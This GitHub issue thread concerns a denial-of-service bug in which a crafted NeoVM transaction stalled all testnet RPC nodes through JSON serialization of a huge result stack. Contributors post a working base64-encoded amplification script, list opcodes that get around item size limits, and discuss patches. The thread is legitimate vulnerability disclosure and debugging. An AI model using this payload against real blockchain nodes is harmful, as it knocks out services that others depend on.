Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

all RPC nodes on testnet stopped syncing maybe caused by some modules #2666

Closed
dusmart opened this issue Mar 3, 2022 · 18 comments
Closed

all RPC nodes on testnet stopped syncing maybe caused by some modules #2666

dusmart opened this issue Mar 3, 2022 · 18 comments

Comments

@dusmart
Copy link

dusmart commented Mar 3, 2022

Describe the bug
Accidentally, we constructed a tx that leaves lots of large StackItems on Result Stack. After sending that, all seed nodes stopped syncing.

To Reproduce

  • sending a tx like this 0x40e171249642639be3e54dd6acfe5948b1d3f240f505e7a3403cdc9bd3e1068a

Expected behavior
All nodes go well.

Screenshots
image

(Optional) Additional context
We suspect that this is caused by some neo modules.

@dusmart
Copy link
Author

dusmart commented Mar 3, 2022

curl http://seed5t4.neo.org:20332 -d '{ 
  "jsonrpc": "2.0",
  "id": 1,
  "method": "getblockcount",
  "params": [
    "0x40e171249642639be3e54dd6acfe5948b1d3f240f505e7a3403cdc9bd3e1068a"
  ]
}'

{"jsonrpc":"2.0","id":1,"result":1245636}

They all now stuck at 1245636.

@vang1ong7ang
Copy link
Contributor

vang1ong7ang commented Mar 3, 2022

seems it is because of bugs of plugins like application-log or something else ~

@superboyiii
Copy link
Member

It should be a bug from applicationlog since cli runs after I delete applicationlog.

@vang1ong7ang
Copy link
Contributor

the script is:

0200001000884a4a4a ... 4a4a    ;; (2047 * '4a')

@Jim8y
Copy link
Contributor

Jim8y commented Mar 3, 2022

The ResultStack is 2GB

image

@Jim8y
Copy link
Contributor

Jim8y commented Mar 3, 2022

Based on @dusmart 's exploit,

construct a new exploit that requires 1024 GB of memory:

newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup

AgAAEACISkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKS kpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKS kpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSgHoA8BKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKS kpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKS kpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkp KSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpK

This script consumes incredible amount of memorys. oom on my 64GB memory machine.

@ZhangTao1596
Copy link

ZhangTao1596 commented Mar 4, 2022

I think the root cause is we only consider the cpu usage ignoring memory cost when set OpCode price.
OpCodes like NEWBUFFER DUP are fixed price no matter how many memory they use. Hence a script use 2G memory only cost 0.00013101gas.

@ZhangTao1596
Copy link

construct a new exploit that requires 1024 GB of memory:

newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup

There is StackItem size limit https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngineLimits.cs#L39
You can't create a 1GB item. The maximum is about 1MB.

@Jim8y
Copy link
Contributor

Jim8y commented Mar 4, 2022

@ZhangTao1596 Nop, i checked the code, no size check under the PACK OpCode

Just create 1024 1MB buffers, then pack them together,,,,,,,

Similar Opcodes that can bypass the size limitation:

PACKMAP
PACKSTRUCT
CAT

@ZhangTao1596
Copy link

@Liaojinghui Can you look at https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngine.cs#L1643. I'm not sure if items packed are still count in ReferenceCounter.

@Jim8y
Copy link
Contributor

Jim8y commented Mar 4, 2022

@Liaojinghui Can you look at https://github.com/neo-project/neo-vm/blob/b18e040d2115ed2ea3c9a60ae8722a7865b38927/src/neo-vm/ExecutionEngine.cs#L1643. I'm not sure if items packed are still count in ReferenceCounter.

@ZhangTao1596 The MaxStackSize here is the number of items
It wont stop you from having 2048 items of 1GB

BTW, to answer your question, packed items are remoted from ReferenceCounter, referenceCounter.RemoveStackReference(item);

        /// <summary>
        /// The maximum number of items that can be contained in the VM's evaluation stacks and slots.
        /// </summary>
        public uint MaxStackSize { get; init; } = 2 * 1024;

@Hecate2
Copy link
Contributor

Hecate2 commented Mar 4, 2022

Based on @dusmart 's exploit,

construct a new exploit that requires 1024 GB of memory:

newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup

AgAAEACISkpKSkpKSkpK...

This script consumes incredible amount of memorys. oom on my 64GB memory machine.

Solution:

* set a size limit to `stackitem` or give every stack a maximum size.

* check item size before pusing it to stack

By debugging on Windows, I found no significantly high memory usage during the whole VM execution. But there comes a memory leak at
https://github.com/neo-project/neo-modules/blob/32aacc468ad43600817daabbec834e715017d962/src/RpcServer/RpcServer.SmartContract.cs#L78

json["stack"] = new JArray(engine.ResultStack.Select(p => ToJson(p, settings.MaxIteratorResultItems)));

if the script is called through RPC.
Then we can suspect that
https://github.com/neo-project/neo-modules/blob/32aacc468ad43600817daabbec834e715017d962/src/ApplicationLogs/LogReader.cs#L156

var txJson = TxLogToJson(appExec);

in plugin ApplicationLogs, especially
https://github.com/neo-project/neo-modules/blob/32aacc468ad43600817daabbec834e715017d962/src/ApplicationLogs/LogReader.cs#L74

trigger["stack"] = appExec.Stack.Select(q => q.ToJson()).ToArray();

can lead to memory leak.
With 36 DUP instructions constructing 37 1MB-buffers, the JString objects takes more than 100MB memory.
memory analysis
And there could be more memory cost when JObjects are turned into string.

@erikzhang
Copy link
Member

We have to limit the items in the ResultStack in ApplicationLogs.

@roman-khimov
Copy link
Contributor

sending a tx like this 0x40e171249642639be3e54dd6acfe5948b1d3f240f505e7a3403cdc9bd3e1068a

NeoGo has no problem with this:

{
   "id" : 5,
   "result" : {
      "executions" : [
         {
            "vmstate" : "HALT",
            "trigger" : "Application",
            "gasconsumed" : "13053",
            "stack" : [
               "error: unserializable: nil",
               "error: unserializable: nil",
               "error: unserializable: nil",
               "error: unserializable: nil",
               "error: unserializable: nil",
               "error: unserializable: nil",
               "error: unserializable: nil",

So our nodes never stopped and worked just fine.

newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup

But this script breaks the node, so it should be investigated.

@roman-khimov
Copy link
Contributor

newbuffer, dup, dup,,,,,,,pack(from here, every stackitem is 1GB), dup, dup, dup, dup, dup

But this script breaks the node, so it should be investigated.

And it's all purely JSONization issue, the script itself runs fine and does not consume a lot of memory as @Hecate2 already noticed, but an attempt to make a JSON out of it does.

@roman-khimov
Copy link
Contributor

roman-khimov commented Mar 4, 2022

I think we'll just limit the JSON size. We have two ways to JSONize stack items, one is used for StdLib's jsonSerialize and another for user-facing things (like RPC) with the latter having type information. ToJSON is size-limited (as well as conversion to binary representation, so I think the node would handle this script in a transaction fine), but ToJSONWithTypes is not and that's what we're going to fix (optimizing it along the way, because ToJSON is much faster in some cases).

@roman-khimov
Copy link
Contributor

@roman-khimov May you please test this case?

I don't think it differs a lot from the previous one, it'll all be fixed by nspcc-dev/neo-go#2386.

@roman-khimov
Copy link
Contributor

I think this one was solved quite a while ago and can be closed now.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

8 participants